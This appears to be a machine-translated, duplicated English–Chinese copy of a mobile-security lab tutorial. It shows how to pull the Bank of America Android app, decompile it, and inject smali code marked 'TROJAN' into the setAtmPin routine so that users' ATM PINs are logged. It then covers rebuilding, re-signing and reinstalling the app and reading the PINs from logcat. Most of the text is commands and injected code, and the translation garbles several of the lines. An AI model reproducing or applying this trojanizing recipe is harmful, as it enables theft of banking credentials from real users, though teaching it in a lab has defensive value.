Archived Copy存档副本
If they update the app, and you want the instructions below to work exactly as written, use this archived copy .如果他们更新了应用程序,并且您希望下面的说明完全按照书面说明运行,请使用此存档副本 。
The file downloads into Kali, as shown below.该文件下载到Kali,如下所示。adb shell pm list packages bof adb shell pm list packages bof adb shell pm path com.infonow.bofa adb shell pm path com.infonow.bofa adb pull /data/app/com.infonow.bofa-1.apk adb pull /data/app/com.infonow.bofa-1.apk
apktool d -f -r com.infonow.bofa-1.apk apktool d -f -r com.infonow.bofa-1.apk
The file unpacks, as shown below.文件解压缩,如下所示。 grep setAtmPin -r . grep setAtmPin -r。
The module we want to modify appears, highlighted in the image below.将显示我们要修改的模块,如下图所示。 On your Kali machine, execute this command:在您的Kali机器上,执行以下命令:
nano ./com.infonow.bofa-1/smali_classes5/com/bofa/ecom/servicelayer/model/MDAUserVerificationDetails.smali nano ./com.infonow.bofa-1/smali_classes5/com/bofa/ecom/servicelayer/model/MDAUserVerificationDetails.smali
In nano, press Ctrl+W在nano中,按Ctrl + W. Enter the search string setAtmPin as shown below.输入搜索字符串setAtmPin ,如下所示。
Press Enter to perform the search.按Enter执行搜索。
The routine that gathers the user's ATM card PIN appears, as shown below.显示收集用户的ATM卡PIN的例程,如下所示。
Here's a block of code to copy and paste to help you.这是一个复制和粘贴代码块,可以帮助您。 Don't forget to change .locals to 2 also.不要忘记将.locals更改为2 。
# TROJAN #TROJAN const-string v1, "TROJAN_BofA: PIN:" const-string v1,“TROJAN_BofA:PIN:” invoke-static {v1, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I invoke-static {v1,p1},Landroid / util / Log; - > e(Ljava / lang / String; Ljava / lang / String;)I # END TROJAN #END TROJAN
Type Ctrl+X , Y , Enter to save the file.键入Ctrl + X , Y , Enter以保存文件。
apktool b com.infonow.bofa-1 apktool b com.infonow.bofa-1
There was a "brut.common" error at the end, as shown below, but it seems OK to just ignore it.最后有一个“brut.common”错误,如下所示,但似乎可以忽略它。
Troubleshooting故障排除
If apktool returns errors, as shown below:如果apktool返回错误,如下所示:I think this error comes from a Java version conflict.我认为这个错误来自Java版本冲突。
The simplest fix I found is to just extract a fresh Kali 2019.1 64-bit VM and use it instead of a machine that has been used for other projects.我发现最简单的解决方法是只提取一个新的Kali 2019.1 64位VM并使用它而不是用于其他项目的机器。
Use the apktool that comes with Kali, and add adb with these commands:使用Kali附带的apktool,并使用以下命令添加adb:
If you get a "E: Could not get lock /var/lib/dpkg/lock-frontend" error, restart Kali.如果您收到“E:无法获取锁定/ var / lib / dpkg / lock-frontend”错误,请重新启动Kali。apt update apt更新 apt install android-tools-adb -y apt安装android-tools-adb -y
Execute this command:执行以下命令:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password".提示要求输入“密钥库密码”。 Enter password twice.输入密码两次。 Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.然后,一系列问题会询问您的姓名等。除最后一个问题外,您可以按Enter键 ,您必须回答“ 是” ,如下所示。
Enter the password of password when you are prompted to.出现提示时输入密码。jarsigner -sigalg SHA1withRSA \ jarsigner -sigalg SHA1withRSA \ -digestalg SHA1 -keystore my-release-key.keystore \ -digestalg SHA1 -keystore my-release-key.keystore \ com.infonow.bofa-1/dist/com.infonow.bofa-1.apk alias_name com.infonow.bofa-1 / dist / com.infonow.bofa-1.apk alias_name
The app is signed, as shown below.该应用已签名,如下所示。
adb install com.infonow.bofa-1/dist/com.infonow.bofa-1.apk adb install com.infonow.bofa-1 / dist / com.infonow.bofa-1.apk
The process succeeds, as shown below.该过程成功,如下所示。 If the Bank of America app launches, but cannot connect to the Internet, do these steps:如果美国银行应用程序启动但无法连接到Internet,请执行以下步骤:
You will also have to restart the port forwarding (possibly "socat") and reconnect Kali with "adb connect".您还必须重新启动端口转发(可能是“socat”)并使用“adb connect”重新连接Kali。
adb logcat | grep -i bofa
The terminal pauses, waiting for matching log entries, as shown below.终端暂停,等待匹配的日志条目,如下所示。 The PIN appears in the log, as shown below. PIN显示在日志中,如下所示。